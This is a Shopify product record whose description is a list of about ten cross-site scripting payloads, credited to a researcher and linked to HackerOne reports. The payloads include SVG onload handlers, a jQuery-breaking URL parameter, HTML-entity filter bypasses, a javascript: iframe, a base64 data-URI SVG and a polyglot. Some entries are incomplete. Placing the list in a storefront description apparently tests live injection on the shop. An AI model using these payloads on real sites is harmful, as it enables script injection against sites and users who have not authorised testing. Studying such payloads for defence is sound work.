{"product_id":"xss-svg-xml","title":"xss svg + xml UTAMA","description":"\u003cp\u003eVAIDIK PANDYA @h4x0r_fr34k 10 XSS payloads that you can use! 1. ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E,\u003c\/p\u003e\n\u003csvg onload='alert(\"XSS\")'\u003e \nhttps:\/\/hackerone.com\/reports\/2433634\n\n2. ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e\nhttps:\/\/hackerone.com\/reports\/846338\nThe payload finishes open function calls from jQuery, executes an alert as POC and then finishes the original script tag\n\n3.  \nhttps:\/\/x.com\/botami143\/stat\/Botami143\/status\/1618005491124404224\nWAF \/ Cloudflare Bypass\n\n4. ”\/\u0026gt;\u0026amp;_lt;_script\u0026gt;alert(1)\u0026amp;_lt;\/scr_ipt\u0026gt;”\/\u0026gt; remove the underscores\nhttps:\/\/hackerone.com\/reports\/484434\nfiltering using HTML entities for the alternation of \u0026lt;\u0026gt;, because I noticed that it's filtering the\n\n5. XYZ\nhttps:\/\/pravinponnusamy.medium.com\/xss-payloads-7079c53c8559\n\n6. \u003cscript\u003e\u003c\/script\u003e\/***\/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')\/***\/OnMouseOver {Firefox \u0026amp; Opera}\n\n8. \u003csvg\u003e \u003cforeignobject width=\"100%\" height=\"100%\"\u003e      \u003ciframe src=\"javascript:confirm(10)\"\u003e\u003c\/iframe\u003e        \u003c\/foreignobject\u003e \u003c\/svg\u003e\nhttps:\/\/x.com\/xsspayloads\/st\/XssPayloads\/status\/1773945831952900587\n\n9. \n\u003cscript\u003evar a=document.createElement(\"a\");a.href=\"data:text\/html;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI\/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cG9seWdvbiBpZD0idHJpYW5nbGUiIHBvaW50cz0iMCwwIDAsNTAgNTAsMCIgZmlsbD0iIzAwOTkwMCIgc3Ryb2tlPSIjMDA0NDAwIi8+CiAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KICAgICAgYWxlcnQoJ3hzcycpOwogICA8L3NjcmlwdD4KPC9zdmc+\";http:\/\/a.click();\u003c\/script\u003e\nhttps:\/\/0xkayala.medium.com\/30-encoded-xss-payloads-generated-by-chatgpt-dc0d9ac1c1cc\nEncoded by chatGPT\n\n10. jaVasCript:\/*--\u0026gt;\u003csvg onload='+\/\"\/+\/onmouseover=1\/+\/[*\/[]\/+alert(1)\/\/'\u003e\n\"'alert(1)\u003c\/svg\u003e\u003c\/svg\u003e","brand":"money","offers":[{"title":"Default Title","offer_id":44210815762597,"sku":"","price":0.0,"currency_code":"IDR","in_stock":false}],"thumbnail_url":"\/\/cdn.shopify.com\/s\/files\/1\/0401\/5210\/5125\/files\/evilsvg_3.svg?v=1726850401","url":"https:\/\/mesoancassie.myshopify.com\/products\/xss-svg-xml","provider":"money","version":"1.0","type":"link"}